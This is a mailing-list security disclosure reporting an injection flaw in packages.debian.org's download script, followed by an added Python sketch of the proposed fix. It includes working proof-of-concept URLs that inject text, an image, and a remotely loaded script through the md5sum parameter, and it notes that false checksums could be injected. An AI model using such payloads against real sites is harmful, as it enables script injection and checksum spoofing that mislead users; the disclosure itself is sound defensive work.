code injection in packages.debian.org
Hello,
[please CC me in replies, I'm not subscribed]
it's easy to do some code injection in packages.debian.org:
http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=not%20available%20because%20the%20site%20is%20hacked&arch=i386&type=main
Credits go to fefe (http://blog.fefe.de/?ts=bb838974) for finding this.
Even better:
http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=not%20available%20because%20the%20site%20is%20hacked<script%20src="http://www.cboltz.de/tmp/alert.js"></script>&arch=i386&type=main
Or my personal favorite:
http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=d41d8cd98f00b204e9800998ecf8427e<p>Powered%20by%20<img%20src="http://files.opensuse.org/opensuse/en/f/ff/Opensuse-green.png">&arch=i386&type=main
*SCNR*
One could also "just" inject wrong MD5SUMs easily...
Proposed solution:
Please read the MD5SUM from a file or database instead of a URL parameter ;-)
Regards,
Christian Boltz
--
Fontlinge developer
Fontlinge - font management for Linux / Schriftenverwaltung für Linux
Info and download: http://www.gesindel.de
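The fix the message proposes (take the checksum from a trusted store keyed by the package path, never from the query string, and escape anything echoed into the page) looks roughly like this. This is an added illustration, not the source of download.pl or any Debian code; the TRUSTED_MD5SUMS store and its checksum value are constructed stand-ins for the real Packages file or database.

```python
import html
from urllib.parse import parse_qs

# Constructed stand-in for the trusted checksum store (a Packages file or a
# database in the real service). Keyed by the pool path of the .deb.
TRUSTED_MD5SUMS = {
    # constructed checksum value, not the real one for this package
    "pool/main/d/dietlibc/dietlibc_0.28-3_i386.deb": "0123456789abcdef0123456789abcdef",
}


def trusted_md5sum(file_path: str):
    """Return the checksum from the trusted store, or None if the path is unknown.

    Any md5sum= value the client sends is deliberately never consulted, so a
    caller cannot make the page display a checksum of their choosing.
    """
    return TRUSTED_MD5SUMS.get(file_path)


def render_download_page(query_string: str) -> str:
    """Render the download page for a raw CGI QUERY_STRING.

    Two changes relative to the behaviour reported in the message:
      1. the checksum comes from trusted_md5sum(), so md5sum= in the query is ignored;
      2. every value echoed into HTML goes through html.escape(), so a crafted
         parameter cannot close a tag or inject markup.
    """
    params = parse_qs(query_string, keep_blank_values=True)
    file_param = params.get("file", [""])[0]
    md5 = trusted_md5sum(file_param)
    if md5 is None:
        # Unknown path: echo it only in escaped form and give no checksum at all.
        return "<p>Unknown package file: %s</p>" % html.escape(file_param)
    return "<p>File: %s</p>\n<p>MD5SUM: %s</p>" % (html.escape(file_param), html.escape(md5))


if __name__ == "__main__":
    # Query taken from the message: the md5sum= parameter carries attacker text.
    demo = ("arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb"
            "&md5sum=not%20available%20because%20the%20site%20is%20hacked&arch=i386&type=main")
    print(render_download_page(demo))
```

The rendered page shows the stored checksum regardless of what md5sum= says, and an unknown or malformed file parameter comes back HTML-escaped rather than interpreted as markup.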